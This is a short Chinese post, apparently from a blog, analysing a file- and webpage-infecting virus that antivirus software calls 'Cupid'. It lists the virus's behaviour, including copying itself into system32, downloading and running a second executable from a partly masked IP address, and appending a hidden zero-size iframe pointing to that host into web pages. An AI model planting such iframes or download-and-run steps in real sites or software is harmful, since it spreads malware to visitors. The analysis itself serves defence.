一个网站挂了10来个马，爆强，看到IE状态栏不停闪烁的跳转，只有吃惊的份儿。

其中一个新病毒，毒霸管它叫丘比特，以下是详细分析报告。

该病毒是一个感染型病毒。该病毒会感染后缀为.exe、.scr的可执行文件和.htm、.html、.asp的脚本文件。（李俊太有才了，自熊猫后，越来越多的病毒感染网页格式的文档）

1、将自身拷贝到系统目录下

%SystemRoot%\system32\love.exe

2、该病毒将urlmon.dll拷贝一份名为ok.dll，加载并调用其导出函数URLDownloadToFileA下载并运行另一病毒，其下载路径为

http://63.223.96.***/zcx.exe

3、在脚本尾加

%iframe src=http://63.223.96.***/ma6.htm width=0 height=0%%/iframe%

4、该病毒运行后会自删除。